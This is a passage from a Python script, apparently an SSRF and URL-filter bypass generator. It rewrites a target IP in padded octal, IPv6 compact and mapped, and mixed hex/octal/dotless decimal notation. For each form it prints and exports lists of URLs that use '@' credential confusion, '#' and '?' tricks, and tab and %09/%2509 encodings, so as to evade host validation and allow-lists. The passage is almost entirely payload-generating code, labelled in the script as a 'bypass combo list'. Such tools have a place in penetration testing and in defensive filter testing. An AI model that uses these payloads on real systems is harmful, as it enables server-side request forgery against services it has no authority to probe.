print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 6 - Dotted octal with padding
|
||||||
|
print(bluecolor,"Dotted octal with padding IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP6 = '0' + OCT_SINGLE(ipFrag3) + "." + '00' + OCT_SINGLE(ipFrag2) + "." + '000' + OCT_SINGLE(ipFrag1) + "." + '0000' + OCT_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP6,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP6,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP6,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP6,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP6,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 7 - IPv6 compact version
|
||||||
|
print(bluecolor,"IPv6 compact version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP7 = '[::' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
|
||||||
|
print('http://',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP7,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP7,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP7,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP7,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP7,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 8 - IPv6 mapped version
|
||||||
|
print(bluecolor,"IPv6 mapped version IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP8 = '[::ffff:' + ipFrag3 + "." + ipFrag2 + "." + ipFrag1 + "." + ipFrag0 + ']'
|
||||||
|
print('http://',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP8,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP8,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP8,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP8,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP8,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 9 - Dotted hexadecimal + Dotted octal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted hexadecimal + Dotted octal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP9 = HEX_SINGLE(ipFrag3,"yes") + "." + OCT_SINGLE(ipFrag2) + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP9,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP9,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP9,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP9,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP9,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 10 - Dotted hexadecimal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP10 = HEX_SINGLE(ipFrag3,"yes") + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP10,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP10,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP10,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP10,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP10,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 11 - Dotted octal with padding + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted octal with padding + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP11 = '0' + OCT_SINGLE(ipFrag3) + "." + str(DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
